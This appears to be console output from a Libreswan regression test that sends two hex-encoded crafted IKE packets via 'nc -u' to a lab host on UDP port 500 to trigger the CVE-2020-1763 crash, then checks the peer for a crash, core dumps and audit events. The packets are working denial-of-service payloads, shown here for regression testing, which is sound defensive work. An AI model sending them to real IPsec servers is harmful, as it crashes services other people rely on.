/testing/guestbin/swan-prep west # echo "initdone" initdone west # echo "Sending packets that trigger CVE-2020-1763 bug" Sending packets that trigger CVE-2020-1763 bug west # echo '13da08abbe7c098fb76c232b6eb893d601100500000000000000006c0d00003c00000001000000010000003001010001000000280101000080010007800e0100800200018004000280030001800b0001000c00040001518000000014439b59f8ba676c4c7737ae22eab8f582' | xxd -r -p | nc -u 192.1.2.23 500 west # echo 'e8836b356b7c1bae000000000000000009100200000000000000007c0d00003800000001000000010000002c010100010000002401010000800b0001800c708080010007800e01008003000180020006800400140d000014afcad71368a1f1c96b8696fc7757010000000014a9b9b1034f7e50a2513b47b100bb85a9' | xxd -r -p | nc -u 192.1.2.23 500 west # echo done done west # # if east was already down, we crashed it west # hostname |grep east > /dev/null && ipsec whack --shutdown west # hostname |grep east > /dev/null && grep "packet from" /tmp/pluto.log | sed "s/^.*packet from//" west # ../bin/check-for-core.sh west # if [ -f /sbin/ausearch ]; then ausearch -r -m avc -ts recent ; fi west #